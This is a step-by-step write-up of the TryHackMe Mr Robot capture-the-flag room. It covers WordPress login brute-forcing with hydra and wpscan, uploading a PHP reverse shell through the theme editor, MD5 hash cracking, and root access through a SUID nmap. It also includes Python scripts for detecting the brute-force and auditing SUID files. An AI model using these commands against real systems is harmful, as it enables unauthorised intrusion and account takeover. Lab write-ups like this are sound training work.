Mr Robot CTF (The Easy Way)
Today we will be doing the Mr Robot CTF room on TryHackMe. Mr Robot is a CTF for beginner and intermediate level players.
First we have to download the OpenVPN configuration file and connect to TryHackMe using OpenVPN. The connection process is shown in the Mr Robot CTF room.
Now let's first scan the given IP address using nmap/zenmap. If you are a beginner I recommend using zenmap, as it is the graphical front-end for nmap.
Here I will be using zenmap because it is easier to demonstrate. From the zenmap scan we can see that ports 80 and 443 are open.
As port 80 is for HTTP and 443 is for HTTPS, let's paste the IP address into the browser to open the website.
A website will open. The website is based on the theme of the Mr Robot series.
Now let's search for directories on the website using gobuster.
Syntax for using gobuster against the website's IP address:
gobuster dir -u http://IP -w /path_to_wordlist/
Here the -u flag specifies the URL
and the -w flag specifies the wordlist.
Example:
gobuster dir -u http://10.10.245.39 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2>/dev/null
Here for directory searching we will be using the wordlist directory-list-2.3-medium.txt.
Here 2>/dev/null redirects any error output (stderr) to /dev/null so it does not clutter the results (it's not compulsory).
Now let's try to visit each directory to search for keys or any hints.
After trying a bunch of URLs I found that /wp-login and /robots are two directories that are useful for us.
/wp-login is the login page for WordPress.
/robots (the site's robots.txt) contains the names of the first key file and a dictionary file.
Now let's go to IP/key-1-of-3.txt.
For example: 10.10.72.66/key-1-of-3.txt
Once we visit the above URL we get the first key.
Similarly, let's go to IP/fsocity.dic to download the fsocity.dic file.
Now let's check the number of words inside the fsocity.dic file using the command:
wc fsocity.dic
Here we can see that there are a total of 858160 words in the fsocity.dic file. There is a high chance that many of the words in the file are duplicates, so let's eliminate the duplicate words.
For this we use the following command:
sort fsocity.dic | uniq > sorted_fscociety.dic
The above command sorts the fsocity.dic file and then stores only the unique words in the sorted_fscociety.dic file.
Now let's check the word count of the sorted_fscociety.dic file.
Here we can see that there are now 11451 words, which is far fewer than 858160.
Now our task is to find the username and password for wp-login. For this we use the dictionary we just built (sorted_fscociety.dic).
For the username: as this room is based on the series Mr Robot, whose main character is named Elliot, I tried entering elliot as the username with a random password, and WordPress replied that the password was incorrect for that username. That means the username is valid and only the password is wrong.
The process above is guesswork based on the series, and it is not a realistic scenario. Users who have not watched Mr Robot might find it hard to guess the username, so another way is to brute-force the username using the wordlist above with the help of hydra. This works because the WordPress login form returns a different error message for an unknown username ("Invalid username") than for a valid username with a wrong password, which lets an attacker enumerate valid accounts.
For this, first let's intercept the /wp-login request using Burp Suite to check the parameter names and host.
Now let's use hydra to brute-force the username:
hydra -L sorted_fscociety.dic -p test 10.10.44.38 http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1:F=Invalid username"
-L tries each login name from a file
-p is for the (single) password
^USER^ and ^PASS^ are the fields hydra substitutes on each attempt
&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1 are the POST parameters
:F=Invalid username is the failure string hydra looks for in the response
10.10.200.191 is the target host (the IP changes with each deployment of the machine)
http-post-form specifies the HTTP POST form module
/wp-login/ is the login directory
Here we get elliot as the username.
Now let's brute-force the password of elliot.
To perform the password brute-force let's use the wpscan tool.
The latest wpscan version needs an API token, so first we have to create an account on
and then use the generated API key.
The command to brute-force the password is:
wpscan --url http://IP/wp-login -U elliot -P /location_to_wordlist/ --api-token your_api_key
wpscan --url http://10.10.44.38/wp-login -U elliot -P ~/Downloads/sorted_fscociety.dic --api-token BTmbaz7S8hst4pZi7LEjndkb2c1R9Q6rOg
--url: specifies the full URL that you want to scan (don't forget the 'http')
-U: the username to use
-P: the password file to use
Now let's log in to /wp-login/ using the username elliot and password ER28-0652.
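On the defender's side, both the hydra username attack and the wpscan password attack above produce a burst of POST requests to the login page from a single source, which is visible in the web server's access log even though the request bodies are not. The following Python script is an added example, not part of the original write-up: it parses constructed Apache-style log lines and flags any client that hits wp-login with at least 20 POSTs inside a 60-second window (the thresholds and the sample IPs are assumptions to tune per site).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Start of an Apache/Nginx "combined" log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
LOGIN_PATHS = {"/wp-login.php", "/wp-login/", "/wp-login"}
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect_login_bruteforce(log_text, window_seconds=60, threshold=20):
    """Return {ip: peak} for clients that POST to the login page >= threshold times in any window."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].split("?")[0] in LOGIN_PATHS:
            posts[rec[0]].append(rec[1])
    flagged, window = {}, timedelta(seconds=window_seconds)
    for ip, times in posts.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):          # two-pointer sliding window
            while t - times[start] > window:     # drop timestamps older than the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

def build_sample_log():
    """Constructed sample (not real lab traffic): one client hammers wp-login.php, one normal user."""
    base = datetime.strptime("12/Mar/2024:10:00:00 +0000", TS_FMT)
    def line(ip, offset, method="POST", path="/wp-login.php"):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 4521 "-" "Mozilla/5.0"'
    lines = [line("10.10.14.5", i) for i in range(25)]              # 25 POSTs in 25 s
    lines += [line("192.168.1.20", 5), line("192.168.1.20", 300)]   # two logins, 5 min apart
    lines.append(line("192.168.1.20", 310, "GET", "/index.php"))    # unrelated request
    return "\n".join(lines)

if __name__ == "__main__":
    print(detect_login_bruteforce(build_sample_log()))  # {'10.10.14.5': 25}
```

Pointing the script at a real access log is a matter of reading the file into `detect_login_bruteforce`; a flagged IP is a candidate for rate limiting at the web server or a lockout plugin, and the "Invalid username" versus wrong-password distinction the attack relies on can be removed by making WordPress return one generic login error.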
After logging in, let's try to gain access to the web server using a reverse shell. For this we have to edit a file with the .php extension so that we can add the reverse shell code in PHP.
We will be editing the 404.php file. Go to Appearance -> Editor -> and choose the 404 Template.
Now let's replace the original content of 404.php with the reverse shell code that you can obtain from
In the reverse shell code you have to put your own IP address:
$ip = '127.0.0.1'; // CHANGE THIS
You can also change the port number if you want, but it's not compulsory.
$port = 1234; // CHANGE THIS
Now, to catch the reverse shell, let's start listening with netcat:
nc -lnvp 1234
Here 1234 is the port number.
Now let's browse to IP/404.php to trigger the reverse shell.
The shell we obtain is unstable, so to get a stable shell we use the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
Here we get a stable shell.
Now let's go to the /home/robot directory, where we can see that there are two files.
We don't have permission to read key-2-of-3.txt, as currently we are the daemon user and we need to be robot to read the file. However, we do have the password.raw-md5 file, which contains an MD5 hash of robot's password. MD5 is a hash, not encryption, so it cannot be decrypted; instead let's crack the hash on our local machine using hashcat.
Command used:
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
Here we have copied the content of password.raw-md5 into hash.txt, and -m 0 selects the raw MD5 hash mode.
From the result we learn that the cracked password is abcdefghijklmnopqrstuvwxyz.
Now let's switch to the user robot:
su robot
Password: abcdefghijklmnopqrstuvwxyz
Now let's read the content of key-2-of-3.txt using the command: cat key-2-of-3.txt
Here we successfully get the second key.
The last flag for most CTFs is almost always in the /root directory but only the root user has access to that directory. A very common way of escalating privileges on a Linux system is to look for binaries that have the SUID bit set and abusing them.
Now for the third key we need to reach the /root directory, and for that we need to be root.
To search for potential privilege escalation paths we can use linpeas, LinEnum, or simply the command below, where -perm /6000 matches any file with the SUID or SGID bit set (older versions of find spelled this +6000).
find / -perm /6000 2>/dev/null | grep '/bin/'
Here we can see that the nmap binary has the SUID bit set, and by searching I found out that old versions of nmap can be used to run shell commands via interactive mode.
Command used:
nmap -interactive
!sh
Here we get root access; now let's read the content of key-3-of-3.txt inside /root.
BINGO!! We get the third key.
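Finding the SUID nmap is the attacker's view; the defender's counterpart is to audit set-uid/set-gid files regularly and alert on anything that is not on a known baseline. The Python script below is an added example, not from the original write-up: it reproduces what `find / -perm /6000 -type f` reports and diffs the result against an allowlist (the allowlist contents and the throwaway demo directory it builds are constructed for this example).

```python
import os
import stat
import tempfile

# Constructed, abbreviated allowlist of set-uid/set-gid binaries expected on a typical
# Debian/Ubuntu image; tune it to your own build and keep it under version control.
EXPECTED_SETID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/lib/openssh/ssh-keysign",
}

def find_setid_files(root):
    """Walk `root` and return {path: mode} for regular files with the SUID or SGID bit,
    the same set `find root -perm /6000 -type f` reports; symlinks are never followed."""
    found = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable or vanished; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found[path] = stat.S_IMODE(st.st_mode)
    return found

def audit_setid(root, expected=EXPECTED_SETID):
    """Return set-id files under `root` that are not on the allowlist, as {path: mode}.
    An unexpected entry (such as a set-uid nmap) is the kind of finding to investigate."""
    return {p: m for p, m in find_setid_files(root).items() if p not in expected}

def build_demo_tree():
    """Create a throwaway directory (constructed data for this example) holding one
    set-uid file and one ordinary executable, and return its path."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, mode in (("suspicious-tool", 0o4755), ("harmless", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    demo = build_demo_tree()
    for path, mode in sorted(audit_setid(demo).items()):
        print(f"unexpected set-id file: {path} mode {mode:04o}")
```

Run `audit_setid("/")` as root from a cron job or a configuration-management check and treat any output as an alert; on the lab box the set-uid nmap would appear as exactly such a finding.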
From this lab we learned about various techniques: information gathering (using nmap and gobuster), getting a reverse shell, brute-forcing (using hydra and wpscan) and privilege escalation (exploiting SUID nmap).